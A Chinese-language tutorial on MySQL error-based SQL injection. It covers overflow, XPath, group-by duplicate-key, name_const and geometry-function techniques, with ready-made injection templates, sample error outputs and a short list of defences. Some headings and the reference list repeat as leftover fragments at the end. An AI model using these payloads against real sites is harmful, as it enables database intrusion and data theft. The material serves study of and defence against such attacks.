MySQL报错注入技术全面解析<\/h1>

一、报错注入概述<\/h2>
MySQL报错注入是一种利用数据库机制人为制造错误条件，使查询结果出现在错误信息中的注入技术。相比盲注，报错注入在联合查询受限但能返回错误信息的情况下更为高效。<\/p>

二、报错注入分类及原理<\/h2>

1. 数据类型溢出<\/h3>

BIGINT溢出<\/h4>

MySQL 5.5.5+版本中，整形溢出会报错<\/li>
最大无符号BIGINT值为18446744073709551615<\/li>

溢出示例：

select<\/span> 18446744073709551615<\/span>+<\/span>1<\/span>;
<\/span><\/span>-- ERROR 1690 (22003): BIGINT UNSIGNED value is out of range
<\/span><\/span><\/span><\/code><\/pre><\/li>
使用按位取简写：
select<\/span> ~<\/span>0<\/span>;  -- 等同于18446744073709551615
<\/span><\/span><\/span><\/span>select<\/span> ~<\/span>0<\/span>+<\/span>1<\/span>; -- 溢出报错
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
EXP函数溢出<\/h4>

exp(710)会导致DOUBLE溢出<\/li>
注入示例：
select<\/span> exp(~<\/span>(select<\/span>*<\/span>from<\/span>(select<\/span> user<\/span>())x));
<\/span><\/span>-- ERROR 1690 (22003): DOUBLE value is out of range
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. XPath语法错误<\/h3>
extractvalue和updatexml函数<\/h4>

MySQL 5.1.5+提供这两个XML处理函数<\/li>
当xpath参数不符合语法时会将查询结果包含在错误中<\/li>
示例：
select<\/span> updatexml(1<\/span>,concat(0<\/span>x7e,(select<\/span> @@<\/span>version<\/span>),0<\/span>x7e),1<\/span>);
<\/span><\/span>-- ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'
<\/span><\/span><\/span><\/span>
<\/span><\/span>select<\/span> extractvalue(1<\/span>,concat(0<\/span>x7e,(select<\/span> @@<\/span>version<\/span>),0<\/span>x7e));
<\/span><\/span>-- ERROR 1105 (HY000): XPATH syntax error: '~5.7.17~'
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3. 主键重复（group by报错）<\/h3>
原理<\/h4>

利用count()、rand()和group by的组合导致主键重复<\/li>
floor(rand(0)*2)会产生固定的011011...序列<\/li>
示例：
select<\/span> count<\/span>(*<\/span>) from<\/span> test group<\/span> by<\/span> concat(version<\/span>(),floor(rand(0<\/span>)*<\/span>2<\/span>));
<\/span><\/span>-- ERROR 1062 (23000): Duplicate entry '5.7.171' for key '<group_key>'
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
详细过程<\/h4>

建立空虚拟表<\/li>
处理第一条记录：计算floor(rand(0)*2)=0→不存在→再次计算=1→插入1<\/li>
处理第二条记录：计算=1→存在→count+1<\/li>
处理第三条记录：计算=0→不存在→再次计算=1→尝试插入1但已存在→报错<\/li>
<\/ol>
条件<\/h4>

表中至少需要3条记录<\/li>
rand()序列不能以0,1,0或1,0,1开头<\/li>
<\/ul>
4. 其他特性<\/h3>
列名重复<\/h4>

利用name_const制造重复列名：
select<\/span> *<\/span> from<\/span> (select<\/span> NAME_CONST(version<\/span>(),1<\/span>),NAME_CONST(version<\/span>(),1<\/span>))x;
<\/span><\/span>-- ERROR 1060 (42S21): Duplicate column name '5.7.17'
<\/span><\/span><\/span><\/code><\/pre><\/li>
爆列名：
select<\/span> *<\/span> from<\/span>(select<\/span> *<\/span> from<\/span> test a join<\/span> test b)c<\/span>;
<\/span><\/span>-- ERROR 1060 (42S21): Duplicate column name 'id'
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
几何函数<\/h4>

包括GeometryCollection(),multipoint(),polygon(),multipolygon(),linestring(),multilinestring()<\/li>
参数需符合几何数据格式，否则报错<\/li>
示例（5.5.47有效）：
select<\/span> multipoint((select<\/span> *<\/span> from<\/span> (select<\/span> *<\/span> from<\/span> (select<\/span> version<\/span>())a)b));
<\/span><\/span>-- ERROR 1367 (22007): Illegal non geometric '5.5.47' value
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ul>
三、报错注入技术总结<\/h2>
1. floor()报错注入<\/h3>

无字符长度限制<\/li>
固定句式：
and<\/span> (select<\/span> 1<\/span> from<\/span> (select<\/span> count<\/span>(*<\/span>),concat((select<\/span> (select<\/span> (payload)) from<\/span> information_schema.tables limit<\/span> 0<\/span>,1<\/span>),floor(rand(0<\/span>)*<\/span>2<\/span>))x from<\/span> information_schema.tables group<\/span> by<\/span> x)a)
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
2. extractvalue()报错<\/h3>

最多32字符<\/li>
固定句式：
and<\/span> extractvalue(1<\/span>,(concat(0<\/span>x7e,(payload),0<\/span>x7e)))
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
3. updatexml()报错<\/h3>

最多32字符<\/li>
固定句式：
and<\/span> updatexml(1<\/span>,(concat(0<\/span>x7e,(payload),0<\/span>x7e)),1<\/span>)
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
4. 其他函数报错<\/h3>

GeometryCollection()<\/li>
polygon()<\/li>
multipoint()<\/li>
multilinestring()<\/li>
multipolygon()<\/li>
linestring()<\/li>
exp()<\/li>
<\/ul>
四、特殊场景处理<\/h2>
字符集冲突错误<\/h3>
当遇到"Illegal mix of collations"错误时，可使用以下方法绕过：<\/p>


使用convert函数：<\/p>
convert<\/span>(version<\/span>() using<\/span> latin1)
<\/span><\/span><\/code><\/pre><\/li>

使用加密函数：<\/p>
aes_decrypt(aes_encrypt(version<\/span>(),1<\/span>),1<\/span>)
<\/span><\/span><\/code><\/pre><\/li>

使用hex转换：<\/p>
unhex(hex(@@<\/span>version<\/span>))
<\/span><\/span><\/code><\/pre><\/li>

其他方法：<\/p>
cast<\/span>(version<\/span>() as<\/span> binary)
<\/span><\/span>convert<\/span>(version<\/span>(),binary)
<\/span><\/span>convert<\/span>(version<\/span>() using<\/span> binary)
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
五、版本差异说明<\/h2>

5.5.47及以下版本在报错中能返回完整查询结果<\/li>
5.5.53+版本返回的报错信息中不包含查询结果<\/li>
几何函数报错在高版本中可能无效<\/li>
<\/ul>
六、防御建议<\/h2>

使用最新版MySQL<\/li>
严格过滤用户输入<\/li>
禁用错误信息回显<\/li>
使用预编译语句<\/li>
设置最小权限原则<\/li>
<\/ol>
七、参考资料<\/h2>

MySQL官方文档：out-of-range-and-overflow<\/li>
http:\/\/codecloud.net\/60086.html<\/li>
http:\/\/www.jinglingshu.org\/?p=4507<\/li>
http:\/\/www.thinkings.org\/2015\/08\/10\/bigint-overflow-error-sqli.html<\/li>
<\/ol>

MySQL报错注入技术全面解析<\/h1>

一、报错注入概述<\/h2> MySQL报错注入是一种利用数据库机制人为制造错误条件，使查询结果出现在错误信息中的注入技术。相比盲注，报错注入在联合查询受限但能返回错误信息的情况下更为高效。<\/p>

二、报错注入分类及原理<\/h2>

1. 数据类型溢出<\/h3>

2. XPath语法错误<\/h3>

3. 主键重复（group by报错）<\/h3>

4. 其他特性<\/h3>

三、报错注入技术总结<\/h2>

四、特殊场景处理<\/h2>

七、参考资料<\/h2> MySQL官方文档：out-of-range-and-overflow<\/li> http:\/\/codecloud.net\/60086.html<\/li> http:\/\/www.jinglingshu.org\/?p=4507<\/li> http:\/\/www.thinkings.org\/2015\/08\/10\/bigint-overflow-error-sqli.html<\/li> <\/ol>

一、报错注入概述<\/h2>
MySQL报错注入是一种利用数据库机制人为制造错误条件，使查询结果出现在错误信息中的注入技术。相比盲注，报错注入在联合查询受限但能返回错误信息的情况下更为高效。<\/p>

七、参考资料<\/h2>

MySQL官方文档：out-of-range-and-overflow<\/li>
http:\/\/codecloud.net\/60086.html<\/li>
http:\/\/www.jinglingshu.org\/?p=4507<\/li>
http:\/\/www.thinkings.org\/2015\/08\/10\/bigint-overflow-error-sqli.html<\/li> <\/ol>